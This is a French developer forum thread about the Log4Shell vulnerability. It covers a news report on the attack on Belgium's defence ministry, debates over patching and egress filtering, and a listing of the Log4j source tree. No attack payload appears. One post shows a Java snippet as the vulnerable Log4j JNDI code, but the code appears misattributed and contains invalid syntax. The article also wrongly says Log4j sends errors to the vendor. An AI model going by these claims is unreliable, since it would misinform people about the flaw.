IdentifiantMot de passe
Loading...
Mot de passe oublié ?Je m'inscris ! (gratuit)
Navigation

Inscrivez-vous gratuitement
pour pouvoir participer, suivre les réponses en temps réel, voter pour les messages, poser vos propres questions et recevoir la newsletter

Sécurité Discussion :

38 % des applications Java toujours affectées par Log4Shell


Sujet :

Sécurité

  1. #41
    Expert éminent sénior
    Avatar de Escapetiger
    Homme Profil pro
    Administrateur système Unix - Linux
    Inscrit en
    Juillet 2012
    Messages
    1 465
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 61
    Localisation : France, Hauts de Seine (Île de France)

    Informations professionnelles :
    Activité : Administrateur système Unix - Linux

    Informations forums :
    Inscription : Juillet 2012
    Messages : 1 465
    Points : 10 995
    Points
    10 995
    Par défaut
    Citation Envoyé par gabriel21 Voir le message
    Je vois dans les crises sécuritaires actuelles un problème plus profond :
    L'architecture système repose sur une notion de couche et les développeurs ne comprennent plus rien aux bases, voir en ont rien à "bip".
    Combien de fois j'ai pu entendre, j'en ai rien à faire de comment ça marche tant que ça marche de la part de nombreux développeurs (et pas uniquement Java ).
    Il nous font "bip" tous ces administrateurs système avec leur "bip" de mise à jour qui casse mon super code de la mort qui tue tout. Parce que le problème, ce n'est pas nous, mais forcément les autres...

    Mais moi qui fait un peu de programmation, mais qui suis administrateur système de vocation, je pleure.
    Pour moi, le minimum est le mieux. Je pleure quand je dois faire 5 mises à jour de noyau Linux parce qu’il y a une faille sur une fonctionnalité que nous n'utilisons pas, mais vous comprenez avoir une personne qui compile un noyau qui correspond à notre besoin, ça coûte trop chère alors on utilise un noyau générique qui pèse 150Mo alors que l'on pourrait utiliser un noyau de 50 Mo qui ne demande pas de mise à jour régulière. Je regrettes ces serveur qui ont un Uptime de 3000 jours, car ayant un noyau optimisé pour leur matériel et n'utilisant pas le chargement dynamique de module du noyau Linux, n'ont pas de failles du moins connue...
    Entièrement d'accord,

    En tant qu'administrateur système et initié au développement également (via Cobol, le shell ksh, bash ...) au départ sur Mainframe (Ordinateur central), c'est effectivement une philosophie de la rigueur qui est difficilement applicable au quotidien dans des environnements inter-dépendants, complexifiés par les couches logicielles, le TTM (Time To Market) exigé (cf. le déploiement continu, DevOps, DevSecOps ...).

    Sous la pression commune à nous tou.te.s, selon leur formation (parfois low-cost en 3, 6 mois), beaucoup de développeurs n'ont pas (plus) le temps, pas l'envie voire ne comprennent pas bien tous les rouages de la compatibilité ascendante et descendante; l'exigence de cloisonnement des environnements de développement, test, pré-production, production, le concept et les bonnes pratiques issues de ITIL (Information Technology Infrastructure Library) etc.

    Comme par exemple dans ce blog de developpez dont on peut s'inspirer à propos de la compatibilté :

    Définissons la compatibilité descendante :

    Le nouveau serveur est compatible avec la version cliente précédente
    Le nouveau client est compatible avec la version serveur précédente

    Compatibilité ascendante :
    l’ancien client est compatible avec la nouvelle version serveur
    l’ancienne version serveur est compatible avec la nouvelle version client

    En fait, c’est quand on développe une nouvelle version qu’il faut se poser la question. (Je connais des développeurs qui se sont fait des noeuds au cerveau avec ça, lol)
    (.../...)
    Source :
    https://blog.developpez.com/cobos/
    Le blog du développeur mainframe agile
    Modernisons les usines de dev COBOL Mainframe
    « Developpez.com est un groupe international de bénévoles dont la motivation est l'entraide au sens large » (incl. forums developpez.net)
    Club des professionnels en informatique

  2. #42
    Chroniqueur Actualités
    Avatar de Bruno
    Homme Profil pro
    Rédacteur technique
    Inscrit en
    Mai 2019
    Messages
    1 825
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : Cameroun

    Informations professionnelles :
    Activité : Rédacteur technique
    Secteur : High Tech - Produits et services télécom et Internet

    Informations forums :
    Inscription : Mai 2019
    Messages : 1 825
    Points : 36 050
    Points
    36 050
    Par défaut Le ministère de la Défense belge subit une cyberattaque en raison d'une vulnérabilité de Log4j
    Le ministère de la Défense belge subit une cyberattaque en raison d'une vulnérabilité de Log4j,
    l'identité des auteurs de l'attaque est toutefois inconnue

    Le ministère belge de la défense a déclaré le 16 décembre avoir découvert une attaque sur son réseau informatique. L'attaque qui a eu lieu la semaine dernière en exploitant l'une des vulnérabilités de Log4j a paralysé certaines activités du ministère. « La Défense a découvert une attaque sur son réseau informatique avec accès à Internet. Des mesures de quarantaine ont été rapidement prises pour isoler les parties touchées. Cette attaque fait suite à l'exploitation de la vulnérabilité Log4j, qui a été rendue publique la semaine dernière et pour laquelle les spécialistes informatiques du monde entier s'engouffrent dans la brèche », a déclaré, Olivier Severin le porte-parole du ministère.

    Depuis jeudi dernier, l'armée belge est aux prises avec les conséquences d'une grave cyberattaque. Une partie du réseau informatique ne peut être utilisée pour l'instant, précise le porte-parole. Le système de messagerie, par exemple, est en panne depuis plusieurs jours. L'attaque informatique s'est produite après qu'une faille de sécurité dans le logiciel ait été découverte la semaine dernière seulement.

    Nom : log4jB.png
Affichages : 7776
Taille : 25,3 Ko

    Comme indiqué précédemment, l'attaque à la Défense a été causée par une faille dans la sécurité du logiciel Log4j d'Apache, largement utilisé. La faille de sécurité est apparue juste avant le week-end et représente un risque important pour les réseaux d'entreprise du monde entier, car de nombreuses applications bien connues utilisent le logiciel en question pour conserver les "journaux".

    Selon le fournisseur israélien de solutions de cybersécurité Check Point Software Technologies, un groupe de pirates informatiques liés au régime iranien, surnommé Charming Kitten ou APT 35, a exploité la faille de Log4j pour lancer des attaques contre sept cibles en Israël, dont des sites gouvernementaux.

    Log4j est une bibliothèque de journalisation open source basée sur Java utilisée dans des millions d'applications. Il y a quelques jours, une vulnérabilité dans Log4J a été découverte. Elle permet à un cybercriminel de provoquer une exécution de code arbitraire à distance s'il a la capacité de soumettre une donnée à une application qui utilise la bibliothèque log4j pour journaliser l'évènement.

    Grâce à Log4j, les entreprises technologiques peuvent vérifier si leurs applications fonctionnent correctement. S'il y a un défaut quelque part dans une application, un message d'erreur est envoyé via Log4j au fabricant, qui peut alors déterminer si une réparation est nécessaire. Amazon, Apple, Cloudflare, Tesla, Minecraft et Twitter, entre autres, utilisent également Log4j.

    L’attaque a été causée par une faille dans la sécurité du logiciel Log4j d'Apache, largement utilisé, selon le ministère de la Défense. La faille de sécurité est apparue juste avant le week-end et représente un risque important pour les réseaux d'entreprise du monde entier, car de nombreuses applications bien connues utilisent le logiciel en question pour conserver des "journaux".

    La semaine dernière, des avertissements ont été lancés concernant les problèmes causés par la fuite dans le logiciel largement utilisé. Les entreprises spécialisées en cybersécurité ont indiqué que le nombre d'attaques profitant de cette faille se multiplient. Pour remédier à cette situation, les membres de l’Apache Software Fondation ont développé un patch.

    Les chercheurs ont signalé qu'il existe au moins deux vulnérabilités dans le correctif, publié sous le nom de Log4J 2.15.0, et que les attaquants exploitent activement l'une d'entre elles ou les deux contre des cibles du monde qui ont déjà appliqué la mise à jour. Les chercheurs ont exhorté les organisations à installer un nouveau correctif, publié en tant que version 2.16.0, dès que possible pour corriger la vulnérabilité, qui est suivie comme CVE-2021-45046.

    Le correctif précédent, ont déclaré les chercheurs, « était incomplet dans certaines configurations autres que celles par défaut » et permettait aux attaquants d'effectuer des attaques par déni de service, ce qui facilite généralement la mise hors ligne des services vulnérables jusqu'à ce que les victimes redémarrent leur serveurs ou prennent d'autres mesures. La version 2.16.0 « résout ce problème en supprimant la prise en charge des modèles de recherche de messages et en désactivant la fonctionnalité JNDI par défaut », selon l'avis de vulnérabilité lié ci-dessus.

    Des chercheurs de la société de sécurité Praetorian ont déclaré qu'il y avait une vulnérabilité encore plus grave dans 2.15.0 (une faille de divulgation d'informations qui peut être utilisée pour télécharger des données à partir des serveurs concernés).

    Le Centre de cybersécurité de Belgique, une organisation gouvernementale, a publié un communiqué de presse indiquant que « Les entreprises qui utilisent le logiciel Apache Log4j et qui n'ont pas encore pris de mesures peuvent s'attendre à des problèmes majeurs dans les jours et les semaines à venir. » La semaine dernière, l'Agence pour la cybersécurité et la sécurité des infrastructures (CISA) du gouvernement américain a publié une directive d'urgence exigeant que les agences fédérales prennent des mesures correctives concernant la vulnérabilité d'Apache Log4j avant le 23 décembre 2021.

    Source : VRT

    Et vous ?

    Quel est votre avis sur le sujet ?

    Voir aussi :

    Jamais deux sans trois : Apache révèle un autre bogue dans la bibliothèque de journalisation Log4J, le troisième correctif majeur en dix jours est une faille de récursivité infinie

    Plus de 35 000 packages Java impactés par les vulnérabilités Log4j, selon un rapport de l'équipe open source de Google

    Des cybercriminels exploitent activement la faille critique dans Log4J : plus de 840 000 attaques ont été détectées, le spectre d'un scénario rappelant Heartbleed fait surface

    Les cybercriminels exploitent la faille "zero-day", alors que les entreprises prennent 97 jours en moyenne pour mettre en œuvre les correctifs, selon HP Wolf Security
    Contribuez au club : corrections, suggestions, critiques, ... Contactez le service news et Rédigez des actualités

  3. #43
    Membre éprouvé
    Homme Profil pro
    Ingénieur sécurité
    Inscrit en
    Avril 2014
    Messages
    498
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 39
    Localisation : France, Hauts de Seine (Île de France)

    Informations professionnelles :
    Activité : Ingénieur sécurité
    Secteur : Industrie

    Informations forums :
    Inscription : Avril 2014
    Messages : 498
    Points : 1 178
    Points
    1 178
    Par défaut
    Mon avis? Bien fait pour le ministère de la défense Belge.

    Une faille pareille ça se corrige dans la minute, pas deux semaines après.

  4. #44
    Expert éminent Avatar de marsupial
    Homme Profil pro
    Retraité
    Inscrit en
    Mars 2014
    Messages
    1 760
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : Autre

    Informations professionnelles :
    Activité : Retraité

    Informations forums :
    Inscription : Mars 2014
    Messages : 1 760
    Points : 7 185
    Points
    7 185
    Par défaut
    Je suis d'accord mais je ne saurai pas trop prompte à jeter la pierre car les belges n'ont peut-être pas les ressources nécessaires. pour appliquer le correctif. Le monde entier défend et attaque sur cette vulnérabilité, et le temps joue contre les défenseurs. Plus le temps passe, plus il risque d'y avoir des attaques victorieuses. Et tout le monde ne dit pas s'il a été powned donc les belges sont loin d'être les seuls.
    Repeat after me
    Le monsieur lutte pour la défense des libertés individuelles et collectives

    Repeat after me...

  5. #45
    Membre éprouvé
    Homme Profil pro
    Ingénieur sécurité
    Inscrit en
    Avril 2014
    Messages
    498
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 39
    Localisation : France, Hauts de Seine (Île de France)

    Informations professionnelles :
    Activité : Ingénieur sécurité
    Secteur : Industrie

    Informations forums :
    Inscription : Avril 2014
    Messages : 498
    Points : 1 178
    Points
    1 178
    Par défaut
    C'est vrai mais ce n'est pas parce que le serveur n'est pas patché qu'il est vulnérable.
    Ca veut aussi dire qu'ils ont ouvert un sacré flux ANY en destination de sortie et ça ce n'est pas vraiment pardonnable de la part d'un ministère de la défense.

    Bon et bien sur qu'ils n'ont aucun IPS, certainement aucun EDR, qu'ils n'ont fait aucun audit et donc aucun patch/mitigation. Donc par extrapolation qu'ils n'ont aucun ingénieur sécurité.

  6. #46
    Membre expérimenté
    Homme Profil pro
    retraité
    Inscrit en
    Septembre 2014
    Messages
    604
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : France, Paris (Île de France)

    Informations professionnelles :
    Activité : retraité

    Informations forums :
    Inscription : Septembre 2014
    Messages : 604
    Points : 1 441
    Points
    1 441
    Par défaut
    Citation Envoyé par tabouret Voir le message
    Mon avis? Bien fait pour le ministère de la défense Belge.

    Une faille pareille ça se corrige dans la minute, pas deux semaines après.
    Ah le sale gosse ! Gros prétentieux en plus !
    Bonhomme, si c'était aussi simple. Les YAKA-FAUKON...on en a plein !

  7. #47
    Membre expérimenté
    Homme Profil pro
    retraité
    Inscrit en
    Septembre 2014
    Messages
    604
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : France, Paris (Île de France)

    Informations professionnelles :
    Activité : retraité

    Informations forums :
    Inscription : Septembre 2014
    Messages : 604
    Points : 1 441
    Points
    1 441
    Par défaut
    En voilà une qui devrait alarmer encore plus en ces temps de télétravail :

    https://portswigger.net/daily-swig/m...k-ip-addresses

    Extrait : "Bräunlein told The Daily Swig: “An attacker could use the SSRF to scan for internal HTTP(s) services and send requests with the Log4Shell payload in the request URI to all of them to try to exploit vulnerable services that are not reachable from the internet.”"

  8. #48
    Membre éprouvé
    Homme Profil pro
    Ingénieur sécurité
    Inscrit en
    Avril 2014
    Messages
    498
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 39
    Localisation : France, Hauts de Seine (Île de France)

    Informations professionnelles :
    Activité : Ingénieur sécurité
    Secteur : Industrie

    Informations forums :
    Inscription : Avril 2014
    Messages : 498
    Points : 1 178
    Points
    1 178
    Par défaut
    Citation Envoyé par TotoParis Voir le message
    Ah le sale gosse ! Gros prétentieux en plus !
    Bonhomme, si c'était aussi simple. Les YAKA-FAUKON...on en a plein !


    Non sans déconner deux semaines qu'on en parle, qu'on est averti par l'ANSSI et autre organisme à tous les étages... OK ils n'ont pas les moyens de déployer un IPS, un EDR ni même de patcher leur truc. Mais sérieux tu coupes au minimum tous tes flux de sortie ou tu filtres drastiquement via de simples règles firewall, tu ne laisses pas un gros ANY.

  9. #49
    Expert éminent sénior
    Avatar de Escapetiger
    Homme Profil pro
    Administrateur système Unix - Linux
    Inscrit en
    Juillet 2012
    Messages
    1 465
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 61
    Localisation : France, Hauts de Seine (Île de France)

    Informations professionnelles :
    Activité : Administrateur système Unix - Linux

    Informations forums :
    Inscription : Juillet 2012
    Messages : 1 465
    Points : 10 995
    Points
    10 995
    Par défaut
    Nous sommes dans un forum spécialisé mais tout de même pour une question de clarté avec tous ces sigles :

    IPS
    « Un système de prévention d'intrusion (ou IPS, intrusion prevention system) est un outil des spécialistes en sécurité des systèmes d'information, similaire aux systèmes de détection d'intrusion (ou IDS, intrusion detection system), permettant de prendre des mesures afin de diminuer les impacts d'une attaque. C'est un IDS actif, il peut par exemple détecter un balayage automatisé malveillant, et bloquer les ports.

    Les IPS peuvent donc parer les attaques connues et inconnues. Comme les IDS, ils ne sont pas fiables à 100 % et risquent même en cas de faux positif de bloquer du trafic légitime.
    (.../...) »

    EDR
    « Un logiciel de type EDR désigne une technologie émergente de détection des menaces sur les EndPoints (ordinateurs, serveurs). Ce terme Endpoint Detection and Response (EDR), est utilisé pour la première fois en juillet 2013 par Anton Chuvakin1 de la société Gartner.
    (.../...)
    Combiné avec un moteur basé sur de l'intelligence artificielle, le logiciel EDR est très réactif dans la détection et l'arrêt de menaces (Malwares, virus, attaques zero Day, menaces persistantes avancées, ...). L'intelligence artificielle lui permet d'être auto-apprenant et de ne pas devoir se connecter sur internet pour mettre à jour des bases de données.
    »

    Sources Wikipedia :

    Système de prévention d'intrusion

    Endpoint detection and response
    « Developpez.com est un groupe international de bénévoles dont la motivation est l'entraide au sens large » (incl. forums developpez.net)
    Club des professionnels en informatique

  10. #50
    Expert éminent
    Avatar de sekaijin
    Homme Profil pro
    Urbaniste
    Inscrit en
    Juillet 2004
    Messages
    4 205
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 60
    Localisation : France, Yvelines (Île de France)

    Informations professionnelles :
    Activité : Urbaniste
    Secteur : Santé

    Informations forums :
    Inscription : Juillet 2004
    Messages : 4 205
    Points : 9 127
    Points
    9 127
    Par défaut
    Lister les dépendances par transitivité pour connaitre les projet "Potentiellement" impactés
    N'est en soit pas très compliqué mais très largement insuffisant surtout si on fait ça sur maven central.
    En effet Maven Central garde aussi toute les vielles versions donc même s'il y a eu des corrections les version non corrigé restent.

    On peut très vite avoir des chiffres énorme sans pour autant que ce soit la cata.

    Quant à ce que que j'ai lu ici sur YAKAFOKON c'est très loin d'être si facile. Je m'occupe d'un outil qui est composé de centaines d'éléments divers avec un chargement dynamique la bête a tourné 8 ans sans interruption, avec des mise à jour à chaud, un changement de serveur physique à chaud (juste des arrêts partiels de certain composants quelques minutes).
    Arriver à qualifier la compatibilité de plusieurs centaines de composants est un très long travail. Il nous est déjà arrivé de revenir en arrière après plusieurs mois de travail parce qu'un composants n'était plus compatible avec l'ensemble.

    Quant à l'approche de google si j'avais suivi la même approche j'aurais à ce jour environs 200 projet impactés.
    Hors tous dépendent d'une librairie qui est compilé avec log4j (donc une dépendance). Mais cette librairie importe une partie seulement de log4j et supprime tout le code inutile. La partie impactée par le PB de sécurité n'est plus dans le code de la lib. les 200 projets ne sont donc pas impactés.

    à contraio je suis tombé sur un dev qui importe par transitivité un clone de log4j qui lui embarque le code en question et là l'approche de Google ne l'a pas trouvé et pour cause. Ouf il s'agissait d'un démonstrateur pas de prod.

    Donc à tous les YAKAFOKON Oui il est très simple dans le gestionnaire de dépendance de surcharger la version de log4j pour en choisir une non impactée.
    Mais sur les millions de lignes de code comment garantir que ce changement ne va pas introduire de bug ?
    On pourrait imaginer que finalement ce ne sont que des log c'est pas si grave si on n'a pas la trace tant que le prog fonctionne mais voilà un changement de version de log4j sans précaution et up un nullpointerexception dans un log.info et le prog ne fonctionne plus.

    Il n'y a rien de simple. C'est un travail permanent, une vigilance, et des mois de tests pour valider un assemblage.

    A+JYT

  11. #51
    Membre averti
    Homme Profil pro
    Dev
    Inscrit en
    Novembre 2006
    Messages
    112
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 42
    Localisation : France, Alpes Maritimes (Provence Alpes Côte d'Azur)

    Informations professionnelles :
    Activité : Dev

    Informations forums :
    Inscription : Novembre 2006
    Messages : 112
    Points : 350
    Points
    350
    Par défaut
    Citation Envoyé par tmcuh Voir le message
    J'ai jamais compris qu'un programmeur voulait dépendre d'une librairie (de plusieurs Mo) qui va écrire dans un fichier un log.txt. Cet Class est reproduite en 30 min (en y mettant pleins de contrôles) et utilisé dans tous vos projets, pourquoi dépendre d'un Framework que tout le monde utilise et qui étant open source permet de trouver des failles plus facilement ?
    Y'a une réelle fénéantise des développeur nouvelle génération c'est une certitude.
    si tu utilise des frameworks différent ( un pour le web / un autre pour la bdd/ un troisième pour généré des document au format XXX ...) et que chaqu'un à sont propre système de log , quand tu doit configuré le tout tu t'amuserai.

  12. #52
    Membre expérimenté
    Homme Profil pro
    retraité
    Inscrit en
    Septembre 2014
    Messages
    604
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : France, Paris (Île de France)

    Informations professionnelles :
    Activité : retraité

    Informations forums :
    Inscription : Septembre 2014
    Messages : 604
    Points : 1 441
    Points
    1 441
    Par défaut
    Je viens de télécharger, par pure curiosité, la dernière version de LOG4J du site APACHE, et quand je vois le nombre de dossiers et de fichiers dans les dossiers, je comprend que la maintenance du machin ne soit pas des plus simple...La commande qui suit me retourne 7962. Il y a donc 7962 composants source, c'est bien ça ?

    grep -r ".java" apache-log4j-2.17.0-src | wc -l

    Et tout àa comme répertoires (et sous-répertoires) :
    total 464
    0 drwxr-xr-x@ 74 xxxxxxxxxxxxxxxxxxx staff 2516 28 déc 14:23 ./
    0 drwx------+ 12 xxxxxxxxxxxxxxxxxxx staff 408 28 déc 14:08 ../
    32 -rw-r--r--@ 1 xxxxxxxxxxxxxxxxxxx staff 14340 28 déc 14:09 .DS_Store
    8 -rw-r--r--@ 1 xxxxxxxxxxxxxxxxxxx staff 902 25 oct 2020 .dockerignore
    0 drwxr-xr-x@ 5 xxxxxxxxxxxxxxxxxxx staff 170 28 déc 14:08 .github/
    8 -rw-r--r--@ 1 xxxxxxxxxxxxxxxxxxx staff 4 5 déc 20:54 .java-version
    0 drwxr-xr-x@ 4 xxxxxxxxxxxxxxxxxxx staff 136 28 déc 14:08 .mvn/
    8 -rw-r--r--@ 1 xxxxxxxxxxxxxxxxxxx staff 2546 5 déc 20:54 BUILDING.md
    8 -rw-r--r--@ 1 xxxxxxxxxxxxxxxxxxx staff 3786 25 oct 2020 CONTRIBUTING.md
    24 -rw-r--r--@ 1 xxxxxxxxxxxxxxxxxxx staff 11366 25 oct 2020 LICENSE.txt
    8 -rw-r--r--@ 1 xxxxxxxxxxxxxxxxxxx staff 413 5 déc 20:54 NOTICE.txt
    8 -rw-r--r--@ 1 xxxxxxxxxxxxxxxxxxx staff 4094 20 nov 14:52 README.md
    16 -rw-r--r--@ 1 xxxxxxxxxxxxxxxxxxx staff 4489 17 déc 18:43 RELEASE-NOTES.md
    8 -rw-r--r--@ 1 xxxxxxxxxxxxxxxxxxx staff 466 5 déc 20:54 SECURITY.md
    8 -rw-r--r--@ 1 xxxxxxxxxxxxxxxxxxx staff 801 25 oct 2020 checkstyle-header.txt
    8 -rw-r--r--@ 1 xxxxxxxxxxxxxxxxxxx staff 3061 25 oct 2020 checkstyle-import-control.xml
    8 -rw-r--r--@ 1 xxxxxxxxxxxxxxxxxxx staff 993 25 oct 2020 checkstyle-suppressions.xml
    24 -rw-r--r--@ 1 xxxxxxxxxxxxxxxxxxx staff 10585 25 oct 2020 checkstyle.xml
    40 -rw-r--r--@ 1 xxxxxxxxxxxxxxxxxxx staff 18868 20 nov 14:52 doap_log4j2.rdf
    8 -rw-r--r--@ 1 xxxxxxxxxxxxxxxxxxx staff 1258 4 avr 2021 findbugs-exclude-filter.xml
    8 -rw-r--r--@ 1 xxxxxxxxxxxxxxxxxxx staff 1643 5 déc 20:54 jenkins-toolchains-win.xml
    8 -rw-r--r--@ 1 xxxxxxxxxxxxxxxxxxx staff 1651 5 déc 20:54 jenkins-toolchains.xml
    0 -rw-r--r-- 1 xxxxxxxxxxxxxxxxxxx staff 0 28 déc 14:23 liste.txt
    0 drwxr-xr-x@ 5 xxxxxxxxxxxxxxxxxxx staff 170 28 déc 14:08 log4j-1.2-api/
    0 drwxr-xr-x@ 5 xxxxxxxxxxxxxxxxxxx staff 170 28 déc 14:08 log4j-api/
    0 drwxr-xr-x@ 4 xxxxxxxxxxxxxxxxxxx staff 136 28 déc 14:08 log4j-api-java9/
    0 drwxr-xr-x@ 2 xxxxxxxxxxxxxxxxxxx staff 68 20 nov 14:58 log4j-api-scala_2.10/
    0 drwxr-xr-x@ 2 xxxxxxxxxxxxxxxxxxx staff 68 20 nov 14:58 log4j-api-scala_2.11/
    0 drwxr-xr-x@ 4 xxxxxxxxxxxxxxxxxxx staff 136 28 déc 14:08 log4j-appserver/
    0 drwxr-xr-x@ 3 xxxxxxxxxxxxxxxxxxx staff 102 28 déc 14:08 log4j-bom/
    0 drwxr-xr-x@ 5 xxxxxxxxxxxxxxxxxxx staff 170 28 déc 14:08 log4j-cassandra/
    0 drwxr-xr-x@ 5 xxxxxxxxxxxxxxxxxxx staff 170 28 déc 14:08 log4j-core/
    0 drwxr-xr-x@ 4 xxxxxxxxxxxxxxxxxxx staff 136 28 déc 14:08 log4j-core-its/
    0 drwxr-xr-x@ 4 xxxxxxxxxxxxxxxxxxx staff 136 28 déc 14:08 log4j-core-java9/
    0 drwxr-xr-x@ 4 xxxxxxxxxxxxxxxxxxx staff 136 28 déc 14:08 log4j-couchdb/
    0 drwxr-xr-x@ 4 xxxxxxxxxxxxxxxxxxx staff 136 28 déc 14:08 log4j-distribution/
    0 drwxr-xr-x@ 4 xxxxxxxxxxxxxxxxxxx staff 136 28 déc 14:08 log4j-docker/
    0 drwxr-xr-x@ 4 xxxxxxxxxxxxxxxxxxx staff 136 28 déc 14:08 log4j-flume-ng/
    0 drwxr-xr-x@ 4 xxxxxxxxxxxxxxxxxxx staff 136 28 déc 14:08 log4j-iostreams/
    0 drwxr-xr-x@ 5 xxxxxxxxxxxxxxxxxxx staff 170 28 déc 14:08 log4j-jakarta-web/
    0 drwxr-xr-x@ 4 xxxxxxxxxxxxxxxxxxx staff 136 28 déc 14:08 log4j-jcl/
    0 drwxr-xr-x@ 4 xxxxxxxxxxxxxxxxxxx staff 136 28 déc 14:08 log4j-jdbc-dbcp2/
    0 drwxr-xr-x@ 4 xxxxxxxxxxxxxxxxxxx staff 136 28 déc 14:08 log4j-jmx-gui/
    0 drwxr-xr-x@ 5 xxxxxxxxxxxxxxxxxxx staff 170 28 déc 14:08 log4j-jpa/
    0 drwxr-xr-x@ 4 xxxxxxxxxxxxxxxxxxx staff 136 28 déc 14:08 log4j-jpl/
    0 drwxr-xr-x@ 4 xxxxxxxxxxxxxxxxxxx staff 136 28 déc 14:08 log4j-jul/
    0 drwxr-xr-x@ 4 xxxxxxxxxxxxxxxxxxx staff 136 28 déc 14:08 log4j-kubernetes/
    0 drwxr-xr-x@ 5 xxxxxxxxxxxxxxxxxxx staff 170 28 déc 14:08 log4j-layout-template-json/
    0 drwxr-xr-x@ 4 xxxxxxxxxxxxxxxxxxx staff 136 28 déc 14:08 log4j-liquibase/
    0 drwxr-xr-x@ 4 xxxxxxxxxxxxxxxxxxx staff 136 28 déc 14:08 log4j-mongodb3/
    0 drwxr-xr-x@ 4 xxxxxxxxxxxxxxxxxxx staff 136 28 déc 14:08 log4j-mongodb4/
    0 drwxr-xr-x@ 2 xxxxxxxxxxxxxxxxxxx staff 68 20 nov 14:58 log4j-nosql/
    0 drwxr-xr-x@ 5 xxxxxxxxxxxxxxxxxxx staff 170 28 déc 14:08 log4j-osgi/
    0 drwxr-xr-x@ 4 xxxxxxxxxxxxxxxxxxx staff 136 28 déc 14:08 log4j-perf/
    0 drwxr-xr-x@ 8 xxxxxxxxxxxxxxxxxxx staff 272 28 déc 14:08 log4j-samples/
    0 drwxr-xr-x@ 4 xxxxxxxxxxxxxxxxxxx staff 136 28 déc 14:08 log4j-slf4j-impl/
    0 drwxr-xr-x@ 4 xxxxxxxxxxxxxxxxxxx staff 136 28 déc 14:08 log4j-slf4j18-impl/
    0 drwxr-xr-x@ 4 xxxxxxxxxxxxxxxxxxx staff 136 28 déc 14:08 log4j-spring-boot/
    0 drwxr-xr-x@ 6 xxxxxxxxxxxxxxxxxxx staff 204 28 déc 14:08 log4j-spring-cloud-config/
    0 drwxr-xr-x@ 5 xxxxxxxxxxxxxxxxxxx staff 170 28 déc 14:08 log4j-taglib/
    0 drwxr-xr-x@ 4 xxxxxxxxxxxxxxxxxxx staff 136 28 déc 14:08 log4j-to-slf4j/
    0 drwxr-xr-x@ 5 xxxxxxxxxxxxxxxxxxx staff 170 28 déc 14:08 log4j-web/
    24 -rwxr-xr-x@ 1 xxxxxxxxxxxxxxxxxxx staff 10069 5 déc 20:54 mvnw*
    16 -rw-r--r--@ 1 xxxxxxxxxxxxxxxxxxx staff 6789 5 déc 20:54 mvnw.cmd
    136 -rw-r--r--@ 1 xxxxxxxxxxxxxxxxxxx staff 69291 17 déc 18:50 pom.xml
    0 drwxr-xr-x@ 6 xxxxxxxxxxxxxxxxxxx staff 204 25 oct 2020 src/
    8 -rw-r--r--@ 1 xxxxxxxxxxxxxxxxxxx staff 1380 4 avr 2021 toolchains-docker.xml
    8 -rw-r--r--@ 1 xxxxxxxxxxxxxxxxxxx staff 2833 5 déc 20:54 toolchains-jenkins-ubuntu.xml
    8 -rw-r--r--@ 1 xxxxxxxxxxxxxxxxxxx staff 2807 5 déc 20:54 toolchains-jenkins-win.xml
    8 -rw-r--r--@ 1 xxxxxxxxxxxxxxxxxxx staff 1648 4 avr 2021 toolchains-sample-linux.xml
    8 -rw-r--r--@ 1 xxxxxxxxxxxxxxxxxxx staff 1709 4 avr 2021 toolchains-sample-mac.xml
    8 -rw-r--r--@ 1 xxxxxxxxxxxxxxxxxxx staff 1643 5 déc 20:54 toolchains-sample-win.xml
    0 -rw-r--r--@ 1 xxxxxxxxxxxxxxxxxxx staff 0 11 déc 15:55 velocity.log
    0 drwxr-xr-x@ 4 xxxxxxxxxxxxxxxxxxx staff 136 28 déc 14:08 workflows/

  13. #53
    Expert éminent Avatar de marsupial
    Homme Profil pro
    Retraité
    Inscrit en
    Mars 2014
    Messages
    1 760
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : Autre

    Informations professionnelles :
    Activité : Retraité

    Informations forums :
    Inscription : Mars 2014
    Messages : 1 760
    Points : 7 185
    Points
    7 185
    Par défaut
    Ci-dessous le code qui pose souci dans le composant JNDI de Log4j :

    Code java : Sélectionner tout - Visualiser dans une fenêtre à part
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
      protected JndiReply invokeReadRequest(RequestContext reqCtx) 
        throws NamingException {
        if (Trace.logger.isLoggable(BasicLevel.DEBUG))
          Trace.logger.log(BasicLevel.DEBUG, 
                           "RequestManager.invokeReadRequest(" + reqCtx + ')');
        JndiRequest request = reqCtx.getRequest();
        if (request instanceof LookupRequest) {
          Object obj = lookup((LookupRequest)request) throws NamingException; // code sécurisé
          if (obj != null) {
            ObjectRecord or = (ObjectRecord)obj;
            return new LookupReply(or.getObject());
          } else {
            // This is a context record
            return new JndiReply();
          }
        } else if (request instanceof ListBindingsRequest) {
          Object obj = listBindings((ListBindingsRequest)request);
          return new ListBindingsReply((Binding[])obj);
        } else if (request instanceof ListRequest) {
          Object obj = list((ListRequest)request);
          return new ListReply((NameClassPair[])obj);
        } else {
          return new JndiError(
            new NamingException("Unknown operation"));
        }
      }
    Repeat after me
    Le monsieur lutte pour la défense des libertés individuelles et collectives

    Repeat after me...

  14. #54
    Chroniqueur Actualités

    Homme Profil pro
    Administrateur de base de données
    Inscrit en
    Mars 2013
    Messages
    8 385
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : Canada

    Informations professionnelles :
    Activité : Administrateur de base de données

    Informations forums :
    Inscription : Mars 2013
    Messages : 8 385
    Points : 196 439
    Points
    196 439
    Par défaut Une quatrième vulnérabilité découverte dans la bibliothèque de journalisation Log4J
    Une quatrième vulnérabilité découverte dans la bibliothèque de journalisation Log4J,
    les utilisateurs sont conviés à passer à la version 2.17.1

